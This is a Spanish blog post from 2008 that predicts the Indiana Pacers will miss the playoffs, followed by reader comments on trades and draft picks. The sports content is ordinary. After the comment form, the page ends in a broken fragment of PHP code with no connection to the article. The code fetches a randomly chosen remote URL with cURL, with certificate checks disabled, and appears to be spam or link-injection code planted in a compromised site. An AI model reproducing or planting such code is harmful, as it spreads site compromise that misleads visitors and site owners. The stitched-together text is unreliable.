Indiana Pacers: Relativo paso adelante

26 de September de 2008 por TheDeerHunter

pacerbenchYa tuvo mérito lo de Indiana el año pasado.

En un lugar donde el baloncesto es casi religión la franquicia se había convertido en ruina absoluta. A Larry Bird le tocó la difícil papeleta de revertir la situación allí donde el nivel de exigencia y la paciencia son inversamente proporcionales. A sabiendas que, durante algún tiempo, iba a tener poco o nada que ofrecer a aquellos que se habían acostumbrado a luchar entre los grandes durante muchas temporadas consecutivas, al viejo Pájaro, casi como antaño, no le tembló ni un ápice el pulso para ponerlo todo patas arriba. Era imprescindible olvidar todo lo relacionado con la vieja guardia y un tipo tan listo como él lo sabía.

dannygrangerindyLa apuesta para luchar contra la desilusión y la frustración ha sido clara: Jim O’Brien y una propuesta atractiva. Lo de ganar ya vendrá cuando llegue el momento. La idea es la mar de prosaica… pero ya sabemos qué pasa cuando no hay resultados. De no cuajar, el ambiente podría volverse verdaderamente tenso por aquellos lares.

El caso es que, con la espada de Damocles sobre sus cabezas, prescindiendo de las señas de identidad tradicionales, con unos mimbres escasos y sin contar apenas con sus jugadores más importantes, el equipo planta cara.

Se juntaron dos factores. El buen trabajo de los Granger, Dunleavy, Murphy… y el bajo nivel de la conferencia Este, que les permitió, contra todo pronóstico, luchar hasta el último momento por entrar en la postemporada. No lo lograron, pero con su esfuerzo recuperaron al público para la causa, y eso es mucho decir en Indianapolis.

Pero es como todo. Tanto tienes, tanto quieres. Alcanzas los objetivos y éstos automáticamente crecen en consonancia. Podemos decir que se ha vuelto a hacer un buen trabajo este verano. Al final, El Otro O’Neal estaba acabado en este equipo y es fácil adivinar que se cuenta poco con Tinsley. La pelea de Auburn Hills ya forma parte del pasado.

dunleavylayupEl resto de salidas no afectarán el rendimiento global del equipo: Kareem Rush, Flip Murray y Ike Diogu. A cambio han llegado un puñado de buenos jugadores. T.J. Ford, Jarret Jack, Nesterovic, Maceo, los rookies Hibbert y Brandon Rush… No cabe duda de que hay una plantilla profunda y compensada pero ¿será suficiente? Mucho nos tememos que no.

Tal y como está el panorama ahora mismo en la conferencia, muy pocos creemos que este equipo podrá clasificarse para playoffs. Les resultará tan complicado mantener siquiera los registros que obtuvieron la temporada pasada como mejorar el nivel de juego. Y lo peor es que los aficionados difícilmente les exigirán menos. La realidad es que casi todo lo que se dijo de este equipo el año pasado se podría aplicar a éste, excepto en lo relativo a los que han salido del mismo. Pocos motivos hay para la esperanza, y lo que valía el año pasado de seguro que no valdrá para éste.

Quinteto inicial: TJ Ford, Mike Dunleavy, Danny Granger, Troy Murphy y Jeff Foster

Sexto hombre: Rasho Nesterovic

Pronóstico: Fuera de Playoffs.

Comenta

6 comentarios a esta entrada

  1. Jabho dice:
    #1

    Bastante de acuerdo en cuanto al análisis. Lo principal es que O´brien y TJ Ford encajen. A TJ le va el estilo rapido de Jim, aunque a veces puede ser en exceso rápido.

    Estarán en la lucha por la 8ª plaza del este. yo creo que por encima de Bulls y Bucks. Incluso los veo por encima de Hawks y a la altura de los Heat…

    Espero que hagan buena temporada. Creo que la haran dentro de sus posibilidades

      Citar

  2. Kantonyo dice:
    #2

    No sé hasta que punto los Pacers se han equivocado en el cambio de Brandon Rush por Jerryd Bayless. Brandon fue el MVP de las finales de la NCAA, y no es un mal jugador, pero Bayless apunta alto… puede ser uno de los robos de este año.

    Por otra parte si creo que ha sido una buena elección el trueque TJ Ford, Nesterovic, Hibbert y Baston por O’Neal y Nathan Jawai. Nesterovic y Baston quedaran libres y dejaran un hueco de casi 10 M$. Hibbert era uno de los mejores pivots en el Draft, y seguro que será importante en el equipo, sobre todo pq no existe un pivot dominante en la plantilla. Y por lo que respecta a TJ Ford, es un base con unas cualidades físicas impresionantes y si le respetan las lesiones puede funcionar bastante bien.

    Este equipo da muchas incertidumbres, va a ser díficil que puedan luchar por la octava plaza del este, podría ser una de las cenicientas, aunque calidad para hacerlo mejor tienen.

      Citar

  3. Viva_Dirk dice:
    #3

    En mi opinión estan dando pasos necesarios, ahora mismo cuentan para varios años con un juego exterior con TJ Ford-Dunleavy-Granger, que es un muy buen comienzo, creo que no hemos visto el techo de ninguno de ellos aun en la liga. Luego por dentro también tienen contratos largos Murphy y Hibbert, de Murphy si que hemos visto el tope y es un jugador válido para el juego de O’Brien; de Hibbert espero un pivot completo y con un buen conocimiento del juego, ahí tienen pivot titular para muchos años. En el banco Jack y Nesterovic son buenos suplentes, y si Brandon Rush se acostumbra al papel de 6º hombre, puede ser una gran alternativa a Dunleavy&Granger. Con Marquis Daniels he perdido la esperanza y Foster cumple con su papel a la perfección.

    El momento clave para los Pacers llegará el verano que viene, cuando tendrán hueco salarial para un agente libre, en condiciones normales deberían apostar por un 4, y acabarán contrato como agentes libres restringidos todos los del draft de 2005 y como agentes libres sin restricciones jugadores como Lamar Odom, Shawn Marion o Carlos Boozer.

    Veremos que movimientos puede hacer Bird.

      Citar

  4. planetbasket.net dice:
    #4
  5. TheDeerHunter dice:
    #5

    Resultan especialmente de agradecer estos comentarios que aportan tan buen criterio y valor añadido de
    forma que completan el análisis que aventuré.
    He de advertir que no estoy especialmente puesto en el asunto de los rookies y todo tipo de apreciaciones mínimamente cualificadas que podáis añadir mejorarán el resultado.
    Ya se habló en su día de la sorprendente elección y posterior traspaso de Bayless… supongo que Indiana valoró el renunciar a un gran jugador a cambio de equilibrar la plantilla como lo han hecho. Yo creo que en líneas generales se han movido coherentemente.
    Tienen una base cojonuda… y la clave será ese hipotético agente libre del que habla Viva… pero este año yo no doy un duro por ellos.

      Citar

  6. txusma dice:
    #6

    Yo creo q los Pacers no se imaginaban ni en sus mejores sueños que un jugador como Bayless cayera hasta su eleccion. De haberlo imaginado no creo que el traspaso de TJ Ford se hubiera producido, al menos con los mismos jugadores implicados. Una vez se encontraron con Bayless, evidentemente lo draftearon, y lo traspasaron por otro jugador q pensaron les podia equilibrar mejor la plantilla, como dice Deer.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>